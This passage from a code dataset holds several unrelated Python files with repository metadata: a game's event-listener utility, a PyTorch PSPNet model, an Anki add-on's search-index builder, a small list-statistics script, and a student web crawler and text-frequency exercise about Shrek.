0\n\t\tself.__hard_remove = True\n\n\tdef __remove_listener(self, listener_list, listener):\n\t\t# check if the listener should be hard removed\n\t\t# if so switch it in the list to None\n\t\ttry:\n\t\t\tif self.__hard_remove:\n\t\t\t\tlistener_list.remove(listener)\n\t\t\telse:\n\t\t\t\tlistener_list[listener_list.index(listener)] = None\n\t\texcept ValueError as e: # nicer error:\n\t\t\traise ValueError(str(e) +\n\t\t\t \"\\nTried to remove: \" + str(listener) + \"\\nat \" + str(self) +\n\t\t\t \"\\nList: \" + str([str(i) for i in listener_list]))\n\n\tdef __call_listeners(self, listener_list):\n\t\t# instead of removing from list, switch the listener in position to None\n\t\t# this way, iteration won't be affected while listeners may modify the list\n\t\tself.__hard_remove = False\n\t\t# increase the event call number\n\t\tself.__event_call_number += 1\n\t\tfor listener in listener_list:\n\t\t\tif listener:\n\t\t\t\ttry:\n\t\t\t\t\tlistener()\n\t\t\t\texcept ReferenceError as e:\n\t\t\t\t\t# listener object is dead, don't crash since it doesn't need updates now anyway\n\t\t\t\t\tself.log.warning('The dead are listening to %s: %s', self, e)\n\t\t\t\t\ttraceback.print_stack()\n\n\t\tself.__event_call_number -= 1\n\n\t\tif self.__event_call_number == 0:\n\t\t\tself.__hard_remove = True\n\t\t\tlistener_list[:] = [l for l in listener_list if l]\n\n\t## Normal change listener\n\tdef add_change_listener(self, listener, call_listener_now=False, no_duplicates=False):\n\t\tassert callable(listener)\n\t\tif not no_duplicates or listener not in self.__listeners:\n\t\t\tself.__listeners.append(listener)\n\t\tif call_listener_now: # also call if duplicate is added\n\t\t\tlistener()\n\n\tdef remove_change_listener(self, listener):\n\t\tself.__remove_listener(self.__listeners, listener)\n\n\tdef has_change_listener(self, listener):\n\t\treturn (listener in self.__listeners)\n\n\tdef discard_change_listener(self, listener):\n\t\t\"\"\"Remove listener if it's there\"\"\"\n\t\tif self.has_change_listener(listener):\n\t\t\tself.remove_change_listener(listener)\n\n\tdef clear_change_listeners(self):\n\t\t\"\"\"Removes all change listeners\"\"\"\n\t\tself.__listeners = WeakMethodList()\n\n\tdef _changed(self):\n\t\t\"\"\"Calls every listener when an object changed\"\"\"\n\t\tself.__call_listeners(self.__listeners)\n\n\t## Removal change listener\n\tdef add_remove_listener(self, listener, no_duplicates=False):\n\t\t\"\"\"A listener that listens for removal of the object\"\"\"\n\t\tassert callable(listener)\n\t\tif no_duplicates and listener in self.__remove_listeners:\n\t\t\treturn # don't allow duplicate entries\n\t\tself.__remove_listeners.append(listener)\n\n\tdef remove_remove_listener(self, listener):\n\t\tself.__remove_listener(self.__remove_listeners, listener)\n\n\tdef has_remove_listener(self, listener):\n\t\treturn (listener in self.__remove_listeners)\n\n\tdef discard_remove_listener(self, listener):\n\t\tif self.has_remove_listener(listener):\n\t\t\tself.remove_remove_listener(listener)\n\n\tdef load(self, db, world_id):\n\t\tself.__init()\n\n\tdef remove(self):\n\t\tself.__call_listeners(self.__remove_listeners)\n\t\tself.end()\n\n\tdef end(self):\n\t\tself.__listeners = None\n\t\tself.__remove_listeners = None\n\n\n\"\"\" Class decorator that adds methods for listening for certain events to a class.\nThese methods get added automatically (eventname is the name you pass to the decorator):\n- add_eventname_listener(listener):\n Adds listener callback. This function must take the object as first parameter plus\n\t\tany parameter that might be provided additionally to on_eventname.\n- remove_eventname_listener(listener);\n Removes a listener previously added.\n- has_eventname_listener(listener)\n Checks if a certain listener has been added.\n- on_eventname\n This is used to call the callbacks when the event occurred.\n Additional parameters may be provided, which are passed to the callback.\n\nThe goal is to simplify adding special listeners, as for example used in the\nproduction_finished listener.\n\"\"\"\n\n\ndef metaChangeListenerDecorator(event_name):\n\tdef decorator(clas):\n\t\tlist_name = \"__\" + event_name + \"_listeners\"\n\t\tevent_call_number = \"__\" + event_name + \"call_number\"\n\t\thard_remove_event = \"__hard_remove\" + event_name\n\n\t\t# trivial changelistener operations\n\t\tdef add(self, listener):\n\t\t\tassert callable(listener)\n\t\t\tgetattr(self, list_name).append(listener)\n\n\t\tdef rem(self, listener):\n\t\t\tif getattr(self, hard_remove_event):\n\t\t\t\tgetattr(self, list_name).remove(listener)\n\t\t\telse:\n\t\t\t\tlistener_list = getattr(self, list_name)\n\t\t\t\tlistener_list[listener_list.index(listener)] = None\n\n\t\tdef has(self, listener):\n\t\t\treturn listener in getattr(self, list_name)\n\n\t\tdef on(self, *args, **kwargs):\n\t\t\tsetattr(self, hard_remove_event, False)\n\t\t\tcall_number = getattr(self, event_call_number) + 1\n\t\t\tsetattr(self, event_call_number, call_number)\n\t\t\tfor f in getattr(self, list_name):\n\t\t\t\tif f:\n\t\t\t\t\t# workaround for encapsuled arguments\n\t\t\t\t\tif isinstance(f, Callback):\n\t\t\t\t\t\tf()\n\t\t\t\t\telse:\n\t\t\t\t\t\tf(self, *args, **kwargs)\n\n\t\t\tcall_number = getattr(self, event_call_number) - 1\n\t\t\tsetattr(self, event_call_number, call_number)\n\t\t\tif getattr(self, event_call_number) == 0:\n\t\t\t\tsetattr(self, hard_remove_event, True)\n\t\t\t\tsetattr(self, list_name, [l for l in getattr(self, list_name) if l])\n\n\t\t# add methods to class\n\t\tsetattr(clas, \"add_\" + event_name + \"_listener\", add)\n\t\tsetattr(clas, \"remove_\" + event_name + \"_listener\", rem)\n\t\tsetattr(clas, \"has_\" + event_name + \"_listener\", has)\n\t\tsetattr(clas, \"on_\" + event_name, on)\n\n\t\t# use black __new__ magic to add the methods to the instances\n\t\t# think of it as being executed in __init__\n\t\told_new = clas.__new__\n\n\t\tdef new(cls, *args, **kwargs):\n\t\t\t# this is a proposed way of calling the \"old\" new:\n\t\t\t#obj = super(cls, cls).__new__(cls)\n\t\t\t# which results in endless recursion, if you construct an instance of a class,\n\t\t\t# that inherits from a base class on which the decorator has been applied.\n\t\t\t# therefore, this workaround is used:\n\t\t\tobj = old_new(cls)\n\t\t\tsetattr(obj, list_name, [])\n\t\t\tsetattr(obj, event_call_number, 0)\n\t\t\tsetattr(obj, hard_remove_event, True)\n\t\t\treturn obj\n\t\tclas.__new__ = staticmethod(new)\n\t\treturn clas\n\treturn decorator\n","repo_name":"unknown-horizons/unknown-horizons","sub_path":"horizons/util/changelistener.py","file_name":"changelistener.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"51"} +{"seq_id":"74613606878","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nimport neural_net.extractors as extractors\n\n# This code (both pspnet.py and extractors.py) is a modification of the one developed here https://github.com/Lextal/pspnet-pytorch\n\nclass PSPModule(nn.Module):\n \"\"\"\n This is the core class of PSP (encoder part).\n it applies in parallel different pooling layers (1,2,3,6), each followed by 1x1 convolution.\n Their output is concatenated along depth, also adding the original features,\n and transformed again with a convolution.\n \"\"\"\n\n def __init__(self, features, out_features=1024, sizes=(1, 2, 3, 6)):\n \"\"\"\n @param features: depth of the input tensor\n @param out_features: depth of the output tensor (i.e., number of filters)\n @param sizes: list of the different pooling kernel sizes you want to apply (Pyramid pooling)\n \"\"\"\n super().__init__()\n self.stages = []\n # For each pyramid kernel size, create a stage (i.e., pyramid-pooling + convolution)\n self.stages = nn.ModuleList([self._make_stage(features, size) for size in sizes])\n # This stage applies convolution to the concatenation of the results of pyramid kernels (stages)\n # concatenation of input tensors is made along the depth layer: features * (len(sizes) + 1)\n self.bottleneck = nn.Conv2d(features * (len(sizes) + 1), out_features, kernel_size=1)\n self.relu = nn.ReLU()\n\n def _make_stage(self, features, size):\n \"\"\"\n Applies down-pooling with specified kernel size, followed by 1x1 convolution\n @param features: number of input features = number of output features\n @param size: kernel size for pooling\n \"\"\"\n prior = nn.AdaptiveAvgPool2d(output_size=(size, size)) # Pooling with specified kernel size\n conv = nn.Conv2d(features, features, kernel_size=1, bias=False) # 1x1 convolution\n return nn.Sequential(prior, conv)\n\n def forward(self, feats):\n \"\"\"\n Run the CNN module.\n @param feats: input tensor\n \"\"\"\n h, w = feats.size(2), feats.size(3)\n\n # 1. Apply the stages with different pooling sizes\n # 2. upsample their output to the original with/height (bilinear)\n # 3. also use the original features (feats) as input for the next stage\n priors = [F.interpolate(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True) for stage in self.stages] + [feats]\n\n # 1. Concatenate the stage outputs and the original features\n # 2. Apply convolution\n bottle = self.bottleneck(torch.cat(priors, 1))\n return self.relu(bottle)\n\n\nclass PSPUpsample(nn.Module):\n \"\"\"\n Base module for building the decoder\n \"\"\"\n def __init__(self, in_channels, out_channels):\n \"\"\"\n Create upsample module (size * 2).\n @param in_channels: depth of the input tensor\n @param out_channels: depth of the output tensor\n \"\"\"\n super().__init__()\n self.conv = nn.Sequential(\n # 3x3 convolution\n nn.Conv2d(in_channels, out_channels, 3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.PReLU()\n )\n\n def forward(self, x):\n \"\"\"\n @param x: input tensor\n \"\"\"\n # Double the size of the input tensor with bilinear filter\n h, w = 2 * x.size(2), 2 * x.size(3)\n p = F.interpolate(input=x, size=(h, w), mode='bilinear', align_corners=True)\n # Apply a convolutional layer\n return self.conv(p)\n\n\nclass PSPNet(nn.Module):\n \"\"\"\n Pyramid scene parsing neural network.\n \"\"\"\n def __init__(self, output_type, n_channels=3, regr_range=4, sizes=(1, 2, 3, 6), feature_size=512, backend='resnet34', pretrained=False):\n \"\"\"\n @param output_type: 'regr' if your output is regression ([0,4] range). For classification, it should provide the number of classes.\n @param n_channels: number of input channels for the images\n @param regr_range: None for classification, int to specify output regression range -> [0, regr_range]\n Regression output is Sigmoid(x)*regr_range\n @param sizes: list of pyramid pooling kernel sizes\n @param feature_size: depth of the feature extraction layer\n @param backend: name of the backend for feature extraction (e.g., resnet18, resnet34, resnet50, resnet101, resnet152)\n @param pretrained: True if you want to use pretrained backend\n \"\"\"\n super().__init__()\n\n self.pretrained = pretrained\n self.regr_range = regr_range\n\n # 1. Select Feature extraction layer: from input image to features-tensor\n # pretrained: whether the feature extraction module is pretrained\n # input_depth: specifies the number of channels\n self.feats = getattr(extractors, backend)(pretrained, n_channels)\n\n # 2. Main module with the pyramid pooling layers (applied to extracted features)\n# psp_size = 2048 # output size of resnet --> TODO: qua era fissato in questo modo ma così da errore\n# psp_size = 512 # output size of resnet\n self.psp = PSPModule(feature_size, feature_size//2, sizes) # From psp_size to 1024 channels\n self.drop_1 = nn.Dropout2d(p=0.3)\n\n # 3. Add three upsample layers, with decreasing depth (from original 1024 to 64)\n self.up_1 = PSPUpsample(feature_size//2, feature_size//4)\n self.up_2 = PSPUpsample(feature_size//4, feature_size//8)\n self.up_3 = PSPUpsample(feature_size//8, feature_size//8)\n\n self.drop_2 = nn.Dropout2d(p=0.15)\n\n # 4. Final convolutional layer (1x1) from 64 depth to n_classes (output probabilities)\n # Regression or single-class classification -> use sigmoid\n self.output_type = output_type\n if output_type=='regr' or output_type==1:\n self.final = nn.Sequential(\n nn.Conv2d(feature_size//8, 1, kernel_size=1), # output depth is 1 (just regression)\n nn.Sigmoid()\n )\n # Multi class classification -> use softmax\n elif type(output_type) is int and self.output_type>1:\n self.final = nn.Sequential(\n nn.Conv2d(feature_size//8, output_type, kernel_size=1), # final number of classes\n # Applies softmax\n nn.LogSoftmax()\n )\n\n\n # TODO: questo mi sembra inutile, sembra un \"baseline\" classifier per confrontarlo con la pspnet\n # self.classifier = nn.Sequential(\n # nn.Linear(deep_features_size, 256),\n # nn.ReLU(),\n # nn.Linear(256, n_classes)\n # )\n\n def forward(self, x):\n f, class_f = self.feats(x) # Extract the 2048 features\n p = self.psp(f) # Apply pyramid modules\n p = self.drop_1(p) # dropout\n\n p = self.up_1(p) # upsampling1\n p = self.drop_2(p)\n\n p = self.up_2(p) # upsampling2\n p = self.drop_2(p)\n\n p = self.up_3(p) # upsampling3\n p = self.drop_2(p)\n\n auxiliary = F.adaptive_max_pool2d(input=class_f, output_size=(1, 1)).view(-1, class_f.size(1))\n\n # final convolution\n if self.output_type=='regr': # Regression for Satellite images [0, regr_range]\n return self.regr_range * self.final(p)\n else:\n return self.final(p) # Softmax/sigmoid output (classification)\n\n # TODO: ho rimosso il classificatore 2 che secondo me e' inutile\n # return self.final(p), self.classifier(auxiliary)\n\n def initialize_weights(self, seed):\n \"\"\"\n Initialization of model weights ()\n \"\"\"\n pass","repo_name":"dbdmg/rescue","sub_path":"neural_net/pspnet.py","file_name":"pspnet.py","file_ext":"py","file_size_in_byte":7724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"35029318461","text":"from aqt import mw\nfrom aqt.qt import *\nfrom anki.find import Finder\nimport aqt\nimport time\nimport os\nfrom .state import checkIndex, get_index, set_index, set_corpus, get_corpus, corpus_is_loaded, get_edit\nfrom .logging import *\nfrom .web import loadSynonyms, showSearchResultArea, printStartingInfo\nfrom .fts_index import FTSIndex\nfrom .whoosh_index import WhooshSearchIndex\n\ndef get_notes_in_collection(): \n \"\"\"\n Reads the collection and builds a list of tuples (note id, note fields as string, note tags, deck id, model id)\n \"\"\"\n config = mw.addonManager.getConfig(__name__)\n deckList = config['decks']\n deckStr = \"\"\n for d in list(mw.col.decks.decks.values()):\n if d['name'] in deckList:\n deckStr += str(d['id']) + \",\"\n if len(deckStr) > 0:\n deckStr = \"(%s)\" %(deckStr[:-1])\n \n if deckStr:\n oList = mw.col.db.execute(\"select distinct notes.id, flds, tags, did, mid from notes left join cards on notes.id = cards.nid where did in %s\" %(deckStr))\n else:\n oList = mw.col.db.execute(\"select distinct notes.id, flds, tags, did, mid from notes left join cards on notes.id = cards.nid\")\n uList = list()\n for id, flds, t, did, mid in oList:\n uList.append((id, flds, t, did, str(mid)))\n return uList\n\ndef build_index(force_rebuild = False, execute_after_end = None):\n config = mw.addonManager.getConfig(__name__)\n if get_index() is None:\n if not corpus_is_loaded():\n corpus = get_notes_in_collection()\n set_corpus(corpus)\n #check if we have to rebuild the index\n index_already_there = not force_rebuild and not _should_rebuild()\n #build index in background to prevent ui from freezing\n p = ProcessRunnable(_build_index, index_already_there)\n if execute_after_end is not None:\n p.after_end = execute_after_end\n p.start()\n\ndef _build_index(index_up_to_date):\n\n \"\"\"\n Builds the index. Result is stored in global var searchIndex.\n The index.type is either \"Whoosh\"/\"SQLite FTS3\"/\"SQLite FTS4\"/\"SQLite FTS5\"\n \"\"\"\n start = time.time()\n config = mw.addonManager.getConfig(__name__)\n try:\n useFTS = config['useFTS'] \n except KeyError:\n useFTS = False\n searchIndex = None\n corpus = get_corpus()\n #fts4 based sqlite reversed index\n if config[\"disableNonNativeSearching\"] or useFTS:\n searchIndex = FTSIndex(corpus, config[\"disableNonNativeSearching\"], index_up_to_date)\n end = time.time()\n initializationTime = round(end - start)\n #whoosh index\n else:\n searchIndex = WhooshSearchIndex(corpus, config[\"disableNonNativeSearching\"], index_up_to_date)\n end = time.time()\n initializationTime = round(end - start)\n \n\n searchIndex.finder = Finder(mw.col)\n searchIndex.output.stopwords = searchIndex.stopWords\n searchIndex.output.fields_to_hide_in_results = config[\"fieldsToHideInResults\"]\n searchIndex.selectedDecks = []\n searchIndex.lastSearch = None\n searchIndex.lastResDict = None\n searchIndex.tagSearch = True\n searchIndex.tagSelect = False\n searchIndex.topToggled = True\n searchIndex.output.edited = {}\n searchIndex.initializationTime = initializationTime\n searchIndex.synonyms = loadSynonyms()\n searchIndex.logging = config[\"logging\"]\n try:\n limit = config['numberOfResults']\n if limit <= 0:\n limit = 1\n elif limit > 5000:\n limit = 5000\n except KeyError:\n limit = 500\n searchIndex.limit = limit\n\n try:\n showRetentionScores = config[\"showRetentionScores\"]\n except KeyError:\n showRetentionScores = True\n searchIndex.output.showRetentionScores = showRetentionScores\n try:\n hideSidebar = config[\"hideSidebar\"]\n except KeyError:\n hideSidebar = False\n searchIndex.output.hideSidebar = hideSidebar\n\n if searchIndex.logging:\n log(\"\\n--------------------\\nInitialized searchIndex:\")\n log(\"\"\"Type: %s\\n# Stopwords: %s \\n# Synonyms: %s \\nLimit: %s \\n\"\"\" % (searchIndex.type, len(searchIndex.stopWords), len(searchIndex.synonyms), limit))\n\n editor = aqt.mw.app.activeWindow().editor if hasattr(aqt.mw.app.activeWindow(), \"editor\") else None\n if editor is not None and editor.addMode:\n searchIndex.output.editor = editor\n set_index(searchIndex)\n editor = editor if editor is not None else get_edit() \n showSearchResultArea(editor, initializationTime=initializationTime)\n printStartingInfo(editor)\n \n\ndef _should_rebuild():\n \"\"\"\n Check if the index has to be rebuilt.\n \"\"\"\n\n info = get_index_info()\n corpus = get_corpus() \n config = mw.addonManager.getConfig(__name__)\n\n # if the index type changed, rebuild\n if (info[\"type\"] == \"Whoosh\" and config[\"useFTS\"]) or (info[\"type\"] != \"Whoosh\" and not config[\"useFTS\"]):\n return True\n\n # not used atm, so always false\n if info[\"shouldRebuild\"]:\n toggle_should_rebuild()\n return True\n\n #if db file / index dir is not existing, rebuild\n if config[\"useFTS\"]:\n file_path = os.path.dirname(os.path.realpath(__file__)).replace(\"\\\\\", \"/\").replace(\"/indexing.py\", \"\") + \"/search-data.db\"\n if not os.path.isfile(file_path):\n return True\n else:\n file_path = os.path.dirname(os.path.realpath(__file__)).replace(\"\\\\\", \"/\").replace(\"/indexing.py\", \"\") + \"/index\"\n if not os.path.exists(file_path):\n return True\n\n if info[\"size\"] != len(corpus):\n return True\n\n \n\n \n if len(corpus) < config[\"alwaysRebuildIndexIfSmallerThan\"]:\n return True \n\n #if the decks used when building the index the last time differ from the decks used now, rebuild\n if len(config[\"decks\"]) != len(info[\"decks\"]):\n return True\n\n for d in config[\"decks\"]:\n if d not in info[\"decks\"]:\n return True\n \n\n #if the excluded fields when building the index the last time differ from the excluded fields now, rebuild\n if len(config[\"fieldsToExclude\"]) != len(info[\"fieldsToExclude\"]):\n return True\n\n for model_name, field_list in config[\"fieldsToExclude\"].items():\n if model_name not in info[\"fieldsToExclude\"]:\n return True\n if len(field_list) != len(info[\"fieldsToExclude\"][model_name]):\n return True\n for field_name in field_list:\n if field_name not in info[\"fieldsToExclude\"][model_name]:\n return True\n \n if len(set(config[\"stopwords\"])) != info[\"stopwordsSize\"]:\n return True\n\n return False\n\n\nclass ProcessRunnable(QRunnable):\n \"\"\"\n Only used to build the index in background atm.\n \"\"\"\n def __init__(self, target, *args):\n QRunnable.__init__(self)\n self.t = target\n self.args = args\n self.after_end = None\n\n def run(self):\n self.t(*self.args)\n if self.after_end is not None:\n self.after_end()\n\n def start(self):\n QThreadPool.globalInstance().start(self)\n\n","repo_name":"glutanimate/anki-search-inside-add-card","sub_path":"indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":7063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"74686388639","text":"import random\nfrom statistics import median\n\nliczba_elementow=int(input(\"Ile elementow ma zawierac tablica? \"))\nlist = []\n\nwhile True:\n decyzja = input(\"Czy liczby maja byc losowe [tak/nie]? \")\n if decyzja.lower()==\"tak\":\n najmniejsza = int(input(\"Podaj najmnniejsza liczbe, ktora moze byc wylosowana: \"))\n najwieksza = int(input(\"Podaj najwieksza liczbe, ktora moze byc wylosowana: \"))\n for i in range (liczba_elementow):\n list.append(random.randrange(najmniejsza, najwieksza))\n break\n elif decyzja.lower()==\"nie\":\n for i in range (liczba_elementow):\n list.append(int(input(f\"Wprowadz {i+1} element tablicy: \")))\n break\n\nprint(f\"Lista: {list}\")\nprint(f\"Posortowana lista: {sorted(list)}\")\nprint(f\"Lista sklada sie z : {len(list)} elementow\")\nprint(f\"Suma elementów listy wynosi: {sum(list)} \")\nprint(f\"Największy element listy ma wartosc: {max(list)} \")\nprint(f\"Najmniejszy element listy ma wartosc: {min(list)} \")\nprint(f\"Średnia wszystkich wartości z listy wynosi: {sum(list)/len(list)}\")\nprint(f\"Mediana wszystkich wartośći z listy wynosi: {median(list)} \")","repo_name":"Kebsiula2007/Klasa-2","sub_path":"zajecia 2/listy.py","file_name":"listy.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3818093046","text":"# Chris Straschewski\r\n# CMS180014\r\n# CS 4395.001\r\n\r\n# Web Crawler\r\n\r\n## Build a web crawler function that starts with a URL representing a topic\r\n# and outputs a list of at least 15 relevant URLs. The URLs can be pages within\r\n# the original domain but should have a few outside the original domain.\r\n\r\n# First we need a starter URL\r\nstarting_url = \"https://en.wikipedia.org/wiki/Shrek\"\r\n\r\n# Import soup and requests\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\n\r\n# Function that will loop through and save urls from the website\r\ndef url_looper(url):\r\n\r\n # get requests from starting url\r\n req = requests.get(url)\r\n\r\n # put the requests into text\r\n data = req.text\r\n\r\n # create a soup object with this text\r\n soup = BeautifulSoup(data, features=\"html.parser\")\r\n\r\n # initialize counter\r\n counter = 0\r\n\r\n # write urls to a file to be read after\r\n with open('urls.txt', 'w') as f:\r\n for link in soup.find_all('a'):\r\n #print(link('href'))\r\n f.write(str(link.get('href')) + '\\n\\n')\r\n if counter > 20:\r\n break\r\n counter += 1\r\n\r\n #print(\"end of crawler\")\r\n\r\nurl_looper(starting_url)\r\n\r\n# Function that will loop through urls again but narrow down what gets saved\r\ndef url_looper2(url):\r\n\r\n req = requests.get(url)\r\n\r\n data = req.text\r\n\r\n soup = BeautifulSoup(data, features=\"html.parser\")\r\n\r\n counter = 0\r\n\r\n with open('urls2.txt', 'w') as f:\r\n for link in soup.find_all('a'):\r\n link_str = str(link.get('href'))\r\n if 'Shrek' in link_str or 'shrek' in link_str:\r\n if link_str.startswith('/url?q='):\r\n link_str = link_str[7:]\r\n print('MOD:', link_str)\r\n if '&' in link_str:\r\n i = link_str.find('&')\r\n link_str = link_str[:i]\r\n if link_str.startswith('http') and 'google' not in link_str:\r\n if 'wikipedia' in link_str:\r\n if 'en.wikipedia' in link_str and counter < 15:\r\n f.write(link_str + '\\n')\r\n counter += 1\r\n else:\r\n if 'https://www.the-numbers.com/movie/Shrek' not in link_str and \\\r\n 'https://web.archive.org' not in link_str and \\\r\n 'telegraph.co' not in link_str and \\\r\n 'nytimes' not in link_str and \\\r\n 'yahoo' not in link_str and \\\r\n 'digitalmediafx' not in link_str and \\\r\n 'nicolas-cage' not in link_str and \\\r\n 'jimhillmedia' not in link_str and \\\r\n counter < 15:\r\n\r\n f.write(link_str + '\\n')\r\n counter += 1\r\n\r\n\r\n #print(\"end of crawler\")\r\n\r\nurl_looper2(starting_url)\r\n\r\n# Good links\r\n# 1 https://commons.wikimedia.org/wiki/Category:Shrek_(2001_film)\r\n# 2 https://en.wikiquote.org/wiki/Shrek\r\n# 3 https://variety.com/2001/film/awards/shrek-3-1200468574/\r\n# 4 https://variety.com/2001/scene/vpage/shrek-shleps-in-1117797904/\r\n# 5 https://ew.com/article/2001/05/29/shrek-anti-disney-fairy-tale/\r\n# 6 https://www.vulture.com/2020/12/national-film-registry-2020-dark-knight-grease-and-shrek.html\r\n# 7 http://culture.com/articles/487/shrek-interview-with-mike-myers.phtml\r\n# 8 http://cinema.com/articles/462/shrek-production-notes.phtml\r\n# 9 https://www.indiewire.com/2010/04/dreamworks-tell-all-exposes-katzenberg-shrek-bail-out-238761/\r\n# 10 http://shardlowart.blogspot.com/2010/05/shreks-house-early-concepts.html\r\n# 11 http://culture.com/articles/463/shrek-production-information.phtml\r\n# 12 https://usatoday30.usatoday.com/life/enter/movies/2001-05-18-shrek-more-characters.htm\r\n# 13 https://www.cnn.com/2015/08/06/entertainment/chris-farley-shrek-voice-feat/\r\n# 14 https://www.cbr.com/movie-legends-revealed-myers-minor-change-cost-shrek-4m/\r\n# 15 https://www.thefreelibrary.com/Shrek's+appeal%3B+WHY+MYERS'+OGRE+JUST+HAD+TO+HAVE+SCOTS+ACCENT.-a0117830257\r\n\r\n\r\n# Look at URLs that got saved\r\n#with open('urls2.txt', 'r') as f:\r\n #urls2 = f.read().splitlines()\r\n #print('\\nSaved URLs:')\r\n#for i in urls2:\r\n #print(i)\r\n\r\n\r\n## Write a function to loop through your URLs and scrape all text off each page.\r\n## Store each page’s text in its own file.\r\n\r\n# function to determine if an element is visible\r\ndef visible(element):\r\n if element.parent.name in ['style', 'script', '[document]', 'head', 'title']:\r\n return False\r\n elif re.match('', str(element.encode('utf-8'))):\r\n return False\r\n return True\r\n\r\nimport urllib.request\r\nfrom urllib.request import urlopen, Request\r\nimport re\r\n\r\n# function that gets text from the 15 chosen urls\r\ndef url_text(url):\r\n\r\n html = urllib.request.urlopen(url)\r\n soup = BeautifulSoup(html, features=\"html.parser\")\r\n data = soup.findAll(text=True)\r\n result = filter(visible, data)\r\n temp_list = list(result) # list from filter\r\n temp_str = ' '.join(temp_list)\r\n return temp_str\r\n\r\n# run above function with our text file full of 15 relevant urls\r\n# and put output into 15 text files\r\ncounter = 1\r\n\r\nwith open('urls2.txt', 'r') as f:\r\n urls = f.read().splitlines()\r\nfor i in urls:\r\n with open('url_text_' + str(counter) + '.txt', 'w', encoding=\"utf-8\") as f:\r\n f.write(url_text(i))\r\n counter += 1\r\n\r\n## Write a function to clean up the text from each file. You might need to delete newlines\r\n## and tabs first. Extract sentences with NLTK’s sentence tokenizer. Write the sentences for\r\n## each file to a new file. That is, if you have 15 files in, you have 15 files out.\r\nimport nltk\r\nfrom nltk import sent_tokenize\r\n\r\n\r\ndef clean_text(filename, counter):\r\n\r\n # open passed file for text processing\r\n with open(filename, 'r', encoding=\"utf-8\") as f:\r\n # read raw text and store it into a variable\r\n raw_text = f.read()\r\n\r\n # remove tabs and newlines\r\n raw_text = raw_text.replace('\\n', ' ')\r\n raw_text = raw_text.replace('\\t', ' ')\r\n\r\n # encoding the text to ASCII format\r\n text = raw_text.encode(encoding=\"ascii\", errors=\"ignore\")\r\n # decoding the text\r\n text = text.decode()\r\n # remove semicolons\r\n text = text.replace(';', ' ')\r\n # remove various other symbols\r\n text = text.replace('_', ' ')\r\n text = text.replace('|', ' ')\r\n text = text.replace('/', ' ')\r\n text = text.replace('<', ' ')\r\n text = text.replace('>', ' ')\r\n text = text.replace('\\\\', ' ')\r\n text = text.replace('/', ' ')\r\n text = text.replace('@', ' ')\r\n # cleaning the text to remove extra whitespace\r\n text = \" \".join([word for word in text.split()])\r\n\r\n # lowercase all text\r\n text = text.lower()\r\n\r\n # done with text cleaning\r\n sentences = sent_tokenize(text)\r\n\r\n # create file for output\r\n with open('url_sentences_'+str(counter)+'.txt', 'w', encoding=\"utf-8\") as f:\r\n # for loop to iterate through sentences and print them into file\r\n for sentence in sentences:\r\n f.write(sentence)\r\n\r\n# For loop to send all 15 files into text cleaner and get the 15 sentence files\r\nfor i in range(1, 16):\r\n clean_text('url_text_'+str(i)+'.txt', i)\r\n\r\n## Write a function to extract at least 25 important terms from the pages using an\r\n## importance measure such as term frequency, or tf-idf. First, it’s a good idea to\r\n## lowercase everything, remove stopwords and punctuation. Print the top 25-40 terms\r\nfrom nltk.corpus import stopwords\r\ndef important_terms():\r\n\r\n # we will need a dict that counts word frequency\r\n word_frequency_dict = {}\r\n\r\n # open all 15 files one by one\r\n for i in range(1,16):\r\n with open('url_sentences_'+str(i)+'.txt', 'r', encoding=\"utf-8\") as f:\r\n text = f.read()\r\n # tokenize text\r\n tokens = nltk.word_tokenize(text)\r\n\r\n tokens = [t for t in tokens if t.isalpha() and # only alpha, remove punctuation\r\n t not in stopwords.words('english')] # remove stopwords\r\n\r\n for token in tokens:\r\n if token in word_frequency_dict:\r\n word_frequency_dict[token] += 1\r\n else:\r\n word_frequency_dict[token] = 1\r\n\r\n # sort the dict by count and print the 40 most common words and their counts\r\n sorted_word_freq_dict = dict(sorted(word_frequency_dict.items(), key=lambda x: x[1], reverse=True))\r\n important_words = dict(list(sorted_word_freq_dict.items())[0: 40])\r\n\r\n print(\"\\n40 Most Common Words:\", important_words)\r\n\r\n # Removing some unimportant words\r\n del important_words['end']\r\n del important_words['plus']\r\n del important_words['ad']\r\n del important_words['tv']\r\n del important_words['video']\r\n del important_words['tag']\r\n del important_words['account']\r\n del important_words['print']\r\n del important_words['subscribe']\r\n del important_words['zone']\r\n del important_words['menu']\r\n del important_words['get']\r\n del important_words['news']\r\n del important_words['content']\r\n del important_words['privacy']\r\n\r\n print(\"\\nMost Common Words:\", important_words)\r\n\r\n return important_words\r\n\r\n # from here I'll manually select the 10 most important terms in no particular order\r\n # character (shrek, donkey, fiona, farquaad)\r\n # film (movie)\r\n # myers\r\n # awards\r\n # animated\r\n # like\r\n # see\r\n # variety\r\n # icon\r\n\r\nimportant_terms()\r\n\r\n\r\n## Build a knowledge base\r\n# Dict with sentences straight from the files +\r\n# Dict with our most important terms\r\n# ^ Both would be useful for a chatbot, these could be combined later\r\n\r\n# Dict with sentences from the files\r\nsent_dict = {}\r\nfor i in range(1,16):\r\n with open('url_sentences_'+str(i)+'.txt', 'r', encoding='utf-8') as f:\r\n text = f.read()\r\n sentences = sent_tokenize(text)\r\n for sentence in sentences:\r\n if sentence in sent_dict:\r\n sent_dict[sentence] += 1\r\n else:\r\n sent_dict[sentence] = 1\r\n\r\nprint(sent_dict)\r\n\r\n# Dict with best words was already made earlier, we will now pickle both dicts\r\nimport pickle\r\n\r\nimportant_words = important_terms()\r\n\r\npickle.dump(sent_dict, open('sent_dict.p', 'wb'))\r\npickle.dump(important_words, open('important_dict.p', 'wb'))\r\n\r\nsent_dict = pickle.load(open('sent_dict.p', 'rb'))\r\nprint('\\n', sent_dict)\r\n\r\nimportant_dict = pickle.load(open('important_dict.p', 'rb'))\r\nprint('\\n', 